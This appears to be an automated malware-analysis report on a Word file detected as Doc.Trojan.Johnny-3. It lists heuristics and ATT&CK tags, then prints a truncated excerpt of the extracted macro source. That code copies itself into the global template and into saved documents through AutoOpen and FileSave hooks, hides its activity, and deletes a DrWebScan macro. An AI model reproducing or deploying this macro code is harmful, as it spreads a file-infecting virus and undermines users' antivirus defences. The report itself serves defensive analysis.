Verdict: MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Johnny-3'. It contains a VBA macro with an AutoOpen function, indicating it's designed to execute automatically upon opening. The macro's logic suggests it attempts to copy itself to other documents, a common technique for macro-based malware propagation.
Heuristics (4)
- ClamAV: Doc.Trojan.Johnny-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Johnny-3
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18133 bytes |

SHA-256 (macros.bas): aed446ad6ab4f82871a07636b1522001772f016d5523c4cf86dd4970678f5e09
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "vGojohnny"
Public Sub MAIN()
'Our devise - A copy of "Go Johnny Go" on every computer !
' M.H., E.R.
End Sub
Attribute VB_Name = "Presentz"
Public Sub MAIN() 'fs
Dim d$
Dim MH
Dim i
Dim A$
Dim lnh1
Dim dlg As Object
Dim iMC
Dim BI
On Error GoTo -1: On Error GoTo aend
WordBasic.ScreenUpdating (0)
WordBasic.DisableInput 1
d$ = WordBasic.[FileName$]()
MH = Len(d$)
For i = 0 To MH
A$ = WordBasic.[Right$](d$, i)
A$ = WordBasic.[Left$](WordBasic.[LTrim$](A$), 1)
If A$ = "\" Then GoTo cnt
Next i
cnt:
lnh1 = i - 1
If MH - lnh1 = 0 Then
On Error GoTo -1: On Error GoTo ecss
Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
WordBasic.PrintStatusBar "For Help, press F1"
WordBasic.Dialog.FileSaveAs dlg
If dlg.Format = 0 Then dlg.Format = 1
MC
WordBasic.MacroCopy "Global:Presentz", WordBasic.[FileName$]() + ":FileSave"
WordBasic.FileSaveAs dlg
GoTo aend
Else
If WordBasic.[Right$](d$, 3) = "DOC" Then
MC
WordBasic.FileSaveAs Format:=1
Else
WordBasic.FileSave
End If
End If
ecss:
If Err.Number = 102 Then GoTo aend
aend:
On Error GoTo -1: On Error GoTo aen
iMC = WordBasic.CountMacros(0, 0)
For i = 1 To iMC
If WordBasic.[MacroName$](i, 0, 0) = "FileSaveAs" Then
BI = 1
End If
If WordBasic.[MacroName$](i, 0, 0) = "DrWebScan" Then
WordBasic.Organizer Delete:=1, Source:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Name:="DrWebScan", Tab:=3
End If
If WordBasic.[MacroName$](i, 0, 0) = "FileOpen" Then
WordBasic.Organizer Delete:=1, Source:=WordBasic.[DefaultDir$](2) + "\NORMAL.DOT", Name:="FileOpen", Tab:=3
End If
Next i
If BI = 0 Then
WordBasic.MacroCopy d$ + ":Presentw", "Global:FileSaveAs"
End If
aen:
End Sub
Private Sub MC()
Dim ds$
ds$ = WordBasic.[FileName$]()
WordBasic.MacroCopy "Global:Presentv", ds$ + ":AutoOpen"
WordBasic.MacroCopy "Global:Presentv", ds$ + ":Presentv"
WordBasic.MacroCopy "Global:Presentw", ds$ + ":Presentw"
WordBasic.MacroCopy "Global:Presentz", ds$ + ":Presentz"
WordBasic.MacroCopy "Global:vGojohnny", ds$ + ":vGojohnny"
End Sub
Attribute VB_Name = "Presentw"
Public Sub MAIN() 'fsAs
Dim d$
Dim Dl
Dim i
Dim A$
Dim lnh1
Dim dlg As Object
Dim NO$
Dim O_D_P$
Dim TMP$
Dim stt$
Dim tm$
Dim tm2$
Dim FileN$
Dim NDPh$
On Error GoTo -1: On Error GoTo aend
WordBasic.ScreenUpdating (0)
WordBasic.DisableInput 1
d$ = WordBasic.[FileName$]()
Dl = Len(d$)
For i = 0 To Dl
A$ = WordBasic.[Right$](d$, i)
A$ = WordBasic.[Left$](WordBasic.[LTrim$](A$), 1)
If A$ = "\" Then GoTo cnt
Next i
cnt:
lnh1 = i - 1
If Dl - lnh1 = 0 Then
Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
If dlg.Format = 0 Then dlg.Format = 1
MC
WordBasic.FileSaveAs dlg
GoTo aend
End If
NO$ = LCase(WordBasic.[Right$](d$, lnh1))
O_D_P$ = WordBasic.[DefaultDir$](14)
TMP$ = WordBasic.[DefaultDir$](13)
stt$ = TMP$ + "\doc2.doc"
tm$ = TMP$ + "\" + NO$
tm2$ = TMP$ + "\~wrf7mhr.tmp"
If WordBasic.[Files$](tm2$) = "" Then
WordBasic.FileNewDefault
WordBasic.Insert "NAIPESVOH REHM"
WordBasic.PrintStatusBar "Starting Autosave"
WordBasic.FileSaveAs Name:=TMP$ + "\doc2.doc", Format:=0
WordBasic.FileClose
WordBasic.Rename TMP$ + "\doc2.doc", tm2$
End If
WordBasic.CopyFile FileName:=tm2$, Directory:=tm$
WordBasic.FileOpen tm$
WordBasic.PrintStatusBar "For Help, press F1"
On Error GoTo -1: On Error GoTo ife
Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
WordBasic.CurValues.FileSaveAs dlg
dlg.Name = NO$
WordBasic.Dialog.FileSaveAs dlg
FileN$ = dlg.Name
NDPh$ = WordBasic.[DefaultDir$](14)
If Len(NDPh$) > 3 Then NDPh$ = NDPh$ + "\"
If dlg.Format > 1 Then
WordBasic.FileClose 2
WordBasic.Kill tm$
WordBasic.FileSaveAs N
... (truncated)